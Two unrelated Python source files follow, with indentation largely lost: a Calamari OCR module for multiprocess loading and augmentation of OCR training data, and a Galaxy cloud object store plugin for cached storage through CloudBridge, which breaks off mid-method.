input_dataset.py
|
from .dataset import DataSet, DataSetMode, RawDataSet
from calamari_ocr.ocr.data_processing import DataPreprocessor
from calamari_ocr.ocr.text_processing import TextProcessor
from calamari_ocr.ocr.augmentation import DataAugmenter
from typing import Generator, Tuple, List, Any
import numpy as np
import multiprocessing
from collections import namedtuple
import queue
from calamari_ocr.utils.multiprocessing import tqdm_wrapper
from abc import ABC, abstractmethod
import logging
from .queue_helper import MaxElementsQueuer
from ..augmentation.dataaugmentationparams import DataAugmentationAmount, DataAugmentationAmountReference
logger = logging.getLogger(__name__)
class OrderedQueueTask:
def __init__(self, input_queue, output_queue, context=multiprocessing.get_context()):
self.input_queue = input_queue
self.output_queue = output_queue
self.context = context
self.p = self.context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
data = []
current_idx = 0
while True:
while True:
try:
data.append(self.input_queue.get(timeout=0.1))
except queue.Empty:
continue
except KeyboardInterrupt:
return
break
data.sort(key=lambda data: data[0])
while len(data) > 0 and data[0][0] <= current_idx:
try:
self.output_queue.put(data[0], timeout=0.1)
self.output_queue.task_done()
del data[0]
current_idx += 1
except queue.Full:
continue
except KeyboardInterrupt:
return
DataProcessingTaskData = namedtuple("DataProcessingTaskData", [
"skip_invalid_gt",
"data_aug_params",
"text_processor",
"data_processor",
"data_augmenter",
"generate_only_non_augmented",
])
class DataProcessingTask:
def __init__(self, params, input_queue: multiprocessing.JoinableQueue, output_queue: multiprocessing.JoinableQueue, context=multiprocessing.get_context()):
self.params = params
self.input_queue = input_queue
self.output_queue = output_queue
self.p = context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
while True:
try:
data = self.input_queue.get(timeout=0.1)
except queue.Empty:
continue
except KeyboardInterrupt:
# allow keyboard interrupt
return
out = self.apply_single(*data)
if out:
while True:
try:
self.output_queue.put(out, timeout=0.1)
break
except queue.Full:
continue
except KeyboardInterrupt:
return
self.output_queue.task_done()
def apply_single(self, idx, sample_id, line, text):
#if not dataset.is_sample_valid(sample, line, text):
# if not skip_invalid_gt:
# print("ERROR: invalid sample {}".format(sample))
# return None
if self.params.data_processor and line is not None:
line, params = self.params.data_processor.apply([line], 1, False)[0]
else:
params = None
if self.params.text_processor and text is not None:
text = self.params.text_processor.apply([text], 1, False)[0]
# data augmentation
if not self.params.data_aug_params.no_augs() \
and line is not None \
and not self.params.generate_only_non_augmented.value \
and self.params.data_augmenter \
and np.random.rand() <= self.params.data_aug_params.to_rel():
line, text = self.params.data_augmenter.augment_single(line, text)
return idx, sample_id, line, text, params
class InputDataset(ABC):
def __init__(self,
mode: DataSetMode,
):
self.mode = mode
self._generate_only_non_augmented = multiprocessing.Value('b', False)
self.initialized = False
def __enter__(self):
if self.initialized:
raise AssertionError("Input dataset already initialized.")
logger.debug("InputDataset {} entered".format(self))
self.initialized = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.initialized = False
logger.debug("InputDataset {} exited".format(self))
def check_initialized(self):
if not self.initialized:
raise AssertionError("InputDataset is not initialised. Call 'with InputDataset() as input_dataset:'. "
"After the scope is closed the threads will be closed, too, for cleaning up.")
@abstractmethod
def __len__(self):
return 0
@abstractmethod
def epoch_size(self):
return len(self)
@property
def generate_only_non_augmented(self):
return self._generate_only_non_augmented.value
@generate_only_non_augmented.setter
def generate_only_non_augmented(self, value):
self._generate_only_non_augmented.value = value
@abstractmethod
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
@abstractmethod
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
class RawInputDataset(InputDataset):
def __init__(self,
mode: DataSetMode,
raw_datas, raw_texts, raw_params,
):
super().__init__(mode)
self.preloaded_datas, self.preloaded_texts, self.preloaded_params = raw_datas, raw_texts, raw_params
def __len__(self):
if self._generate_only_non_augmented.value:
return len(self.preloaded_params)
return len(self.preloaded_datas)
def epoch_size(self):
return len(self)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for text in self.preloaded_texts:
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
for epoch in range(epochs):
if self.mode == DataSetMode.TRAIN:
                # only TRAIN mode here; PRED and EVAL are covered by the else block
                # train mode won't generate parameters
if self._generate_only_non_augmented.value:
                    # preloaded_datas are ordered: first the original data, then the augmented data;
                    # preloaded_params, however, only holds entries for the non-augmented data,
                    # so zipping against it yields only the original data
                    for data, text, _ in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, None
else:
# yield all data, however no params
for data, text in zip(self.preloaded_datas, self.preloaded_texts):
yield data, text, None
else:
# all other modes generate everything we got, but does not support data augmentation
for data, text, params in zip(self.preloaded_datas, self.preloaded_texts, self.preloaded_params):
yield data, text, params
class StreamingInputDataset(InputDataset):
def __init__(self,
dataset: DataSet,
data_preprocessor: DataPreprocessor,
text_preprocessor: TextProcessor,
data_augmenter: DataAugmenter = None,
data_augmentation_factor: float = 0,
skip_invalid_gt=True,
processes=4):
super().__init__(dataset.mode)
self.dataset = dataset
self.data_processor = data_preprocessor
self.text_processor = text_preprocessor
self.skip_invalid_gt = skip_invalid_gt
self.data_augmenter = data_augmenter
self.data_augmentation_params = DataAugmentationAmount.from_factor(data_augmentation_factor)
self.mp_context = multiprocessing.get_context('spawn')
self.processes = max(1, processes)
if data_augmenter and dataset.mode != DataSetMode.TRAIN and dataset.mode != DataSetMode.PRED_AND_EVAL:
            # data augmentation is only allowed for TRAIN and PRED_AND_EVAL datasets
raise Exception('Data augmentation is only supported for training, but got {} dataset instead'.format(dataset.mode))
if not self.data_augmentation_params.no_augs() and self.data_augmenter is None:
            raise Exception('Requested data augmentation, but no data augmenter provided. Use e.g. SimpleDataAugmenter')
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
def __enter__(self):
super().__enter__()
# create all tasks and queues
self.max_queuer = MaxElementsQueuer(self.processes * 4, ctx=self.mp_context)
self.data_input_queue = self.max_queuer.input_queue
self.ordered_output_queue = self.max_queuer.output_queue
self.unordered_output_queue = self.mp_context.JoinableQueue()
self.data_processing_tasks = [
DataProcessingTask(
DataProcessingTaskData(
self.skip_invalid_gt,
self.data_augmentation_params,
self.text_processor,
self.data_processor,
self.data_augmenter,
self._generate_only_non_augmented,
),
self.data_input_queue,
self.unordered_output_queue,
) for _ in range(self.processes)
]
self.data_generator = self.dataset.create_generator(self.mp_context, self.data_input_queue)
self.data_generator.start()
self.data_ordering = OrderedQueueTask(self.unordered_output_queue, self.ordered_output_queue, self.mp_context)
self.data_ordering.start()
for p in self.data_processing_tasks:
p.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# stop all tasks
self.data_generator.stop()
for p in self.data_processing_tasks:
p.stop()
self.data_ordering.stop()
self.data_input_queue = None
self.unordered_output_queue = None
self.data_processing_tasks = []
self.data_generator = None
self.ordered_output_queue = None
self.data_ordering = None
super().__exit__(exc_type, exc_val, exc_tb)
def __len__(self):
return len(self.dataset.samples())
def epoch_size(self):
if self._generate_only_non_augmented.value:
return len(self)
return self.data_augmentation_params.epoch_size(len(self))
def to_raw_input_dataset(self, processes=1, progress_bar=False, text_only=False) -> RawInputDataset:
print("Preloading dataset type {} with size {}".format(self.dataset.mode, len(self)))
prev = self._generate_only_non_augmented.value
self._generate_only_non_augmented.value = True
datas, texts, params = zip(*list(tqdm_wrapper(self.generator(epochs=1, text_only=text_only),
desc="Preloading data", total=len(self.dataset),
progress_bar=progress_bar)))
preloaded_datas, preloaded_texts, preloaded_params = datas, texts, params
self._generate_only_non_augmented.value = prev
if not self.data_augmentation_params.no_augs() and (self.dataset.mode == DataSetMode.TRAIN or self.dataset.mode == DataSetMode.PRED_AND_EVAL):
abs_n_augs = self.data_augmentation_params.to_abs()
preloaded_datas, preloaded_texts \
= self.data_augmenter.augment_datas(list(datas), list(texts), n_augmentations=abs_n_augs,
processes=processes, progress_bar=progress_bar)
return RawInputDataset(self.mode, preloaded_datas, preloaded_texts, preloaded_params)
def text_generator(self) -> Generator[str, None, None]:
self.check_initialized()
for _, text, _ in self.generator(epochs=1, text_only=True):
if self.text_processor:
text = self.text_processor.apply([text], 1, False)[0]
yield text
def generator(self, epochs=1, text_only=False) -> Generator[Tuple[np.array, List[str], Any], None, None]:
self.check_initialized()
self.data_generator.request(epochs, text_only)
for epoch in range(epochs):
for iter in range(len(self.dataset)):
while True:
try:
global_id, id, line, text, params = self.ordered_output_queue.get(timeout=0.1)
yield line, text, params
except queue.Empty:
# test data ordering thread was canceled
if not self.data_ordering.p.is_alive() and self.ordered_output_queue.empty():
return
continue
except KeyboardInterrupt:
return
break
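# --- illustrative usage sketch (not part of the original module) ---
# Assuming a concrete DataSet implementation plus matching DataPreprocessor and
# TextProcessor instances (the names below are placeholders), the streaming
# pipeline is driven through the context manager, which starts and later tears
# down the worker processes:
#
#     with StreamingInputDataset(dataset, data_preprocessor, text_preprocessor,
#                                data_augmenter=None, processes=4) as input_dataset:
#         for line, text, params in input_dataset.generator(epochs=1):
#             ...  # samples arrive preprocessed and in their original order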
|
cloud.py
|
"""
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import os.path
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
)
from galaxy.util.sleeper import Sleeper
from .s3 import parse_config_xml
from ..objectstore import ConcreteObjectStore, convert_bytes
try:
from cloudbridge.factory import CloudProviderFactory, ProviderList
from cloudbridge.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
    "Cloud ObjectStore is configured, but no CloudBridge dependency available. "
    "Please install CloudBridge or modify ObjectStore configuration."
)
class CloudConfigMixin(object):
def _config_to_dict(self):
return {
"provider": self.provider,
"auth": self.credentials,
"bucket": {
"name": self.bucket_name,
"use_reduced_redundancy": self.use_rr,
},
"connection": {
"host": self.host,
"port": self.port,
"multipart": self.multipart,
"is_secure": self.is_secure,
"conn_path": self.conn_path,
},
"cache": {
"size": self.cache_size,
"path": self.staging_path,
}
}
class Cloud(ConcreteObjectStore, CloudConfigMixin):
"""
    Object store that stores objects as items in cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super(Cloud, self).__init__(config, config_dict)
self.transfer_progress = 0
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.provider = config_dict["provider"]
self.credentials = config_dict["auth"]
self.bucket_name = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self.conn = self._get_connection(self.provider, self.credentials)
self.bucket = self._get_bucket(self.bucket_name)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
@staticmethod
def _get_connection(provider, credentials):
log.debug("Configuring `{}` Connection".format(provider))
if provider == "aws":
config = {"aws_access_key": credentials["access_key"],
"aws_secret_key": credentials["secret_key"]}
connection = CloudProviderFactory().create_provider(ProviderList.AWS, config)
elif provider == "azure":
config = {"azure_subscription_id": credentials["subscription_id"],
"azure_client_id": credentials["client_id"],
"azure_secret": credentials["secret"],
"azure_tenant": credentials["tenant"]}
connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config)
elif provider == "google":
config = {"gcp_service_creds_file": credentials["credentials_file"]}
connection = CloudProviderFactory().create_provider(ProviderList.GCP, config)
else:
raise Exception("Unsupported provider `{}`.".format(provider))
# Ideally it would be better to assert if the connection is
# authorized to perform operations required by ObjectStore
# before returning it (and initializing ObjectStore); hence
# any related issues can be handled properly here, and ObjectStore
# can "trust" the connection is established.
#
# However, the mechanism implemented in Cloudbridge to assert if
# a user/service is authorized to perform an operation, assumes
# the user/service is granted with an elevated privileges, such
# as admin/owner-level access to all resources. For a detailed
# discussion see:
#
# https://github.com/CloudVE/cloudbridge/issues/135
#
# Hence, if a resource owner wants to only authorize Galaxy to r/w
# a bucket/container on the provider, but does not allow it to access
# other resources, Cloudbridge may fail asserting credentials.
# For instance, to r/w an Amazon S3 bucket, the resource owner
# also needs to authorize full access to Amazon EC2, because Cloudbridge
# leverages EC2-specific functions to assert the credentials.
#
# Therefore, to adhere with principle of least privilege, we do not
# assert credentials; instead, we handle exceptions raised as a
# result of signing API calls to cloud provider (e.g., GCP) using
# incorrect, invalid, or unauthorized credentials.
return connection
@classmethod
def parse_xml(clazz, config_xml):
# The following reads common cloud-based storage configuration
# as implemented for the S3 backend. Hence, it also attempts to
# parse S3-specific configuration (e.g., credentials); however,
# such provider-specific configuration is overwritten in the
# following.
config = parse_config_xml(config_xml)
try:
provider = config_xml.attrib.get("provider")
if provider is None:
msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore."
log.error(msg)
raise Exception(msg)
provider = provider.lower()
config["provider"] = provider
# Read any provider-specific configuration.
auth_element = config_xml.findall("auth")[0]
missing_config = []
if provider == "aws":
akey = auth_element.get("access_key")
if akey is None:
missing_config.append("access_key")
skey = auth_element.get("secret_key")
if skey is None:
missing_config.append("secret_key")
config["auth"] = {
"access_key": akey,
"secret_key": skey}
elif provider == "azure":
sid = auth_element.get("subscription_id")
if sid is None:
missing_config.append("subscription_id")
cid = auth_element.get("client_id")
if cid is None:
missing_config.append("client_id")
sec = auth_element.get("secret")
if sec is None:
missing_config.append("secret")
ten = auth_element.get("tenant")
if ten is None:
missing_config.append("tenant")
config["auth"] = {
"subscription_id": sid,
"client_id": cid,
"secret": sec,
"tenant": ten}
            elif provider == "google":
                cre = auth_element.get("credentials_file")
                if cre is None:
                    missing_config.append("credentials_file")
                elif not os.path.isfile(cre):
                    msg = "The file specified for GCP credentials was not found: {}".format(cre)
                    log.error(msg)
                    raise IOError(msg)
config["auth"] = {
"credentials_file": cre}
else:
msg = "Unsupported provider `{}`.".format(provider)
log.error(msg)
raise Exception(msg)
if len(missing_config) > 0:
                msg = "The following configuration options required for the {} cloud backend " \
                      "are missing: {}".format(provider, missing_config)
log.error(msg)
raise Exception(msg)
else:
return config
except Exception:
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
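    # Illustrative only (not part of the original module): parse_xml() above reads
    # the `provider` attribute and the provider-specific <auth> attributes, while
    # the shared S3-style settings come from parse_config_xml(). A configuration
    # might therefore look roughly like the sketch below; element and attribute
    # names that are not referenced in the code above are assumptions.
    #
    #   <object_store type="cloud" provider="aws">
    #       <auth access_key="..." secret_key="..."/>
    #       <bucket name="..." use_reduced_redundancy="False"/>
    #       <cache path="database/object_store_cache" size="100"/>
    #   </object_store>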
def to_dict(self):
as_dict = super(Cloud, self).to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
        file size (e.g., (<access time>, '/mnt/data/dataset_1.dat', 472394)).
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
        for entry in file_list:
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception("Could not get bucket '{}'".format(bucket_name))
            raise
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
        # make sure there are no shenanigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
                ret_code = subprocess.call(['axel', '-a', '-n', str(ncores), url])
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
                        created_obj.upload(from_string)
else:
                        self.bucket.objects.get(rel_path).upload(from_string)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
                    log.debug("Pushed cache file '%s' to key '%s' (%s bytes transferred in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
            return bool(self.size(obj, **kwargs) == 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
            # Remove temporary data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
            # but requires iterating through each individual key in S3 and deleting it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
            # Choose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
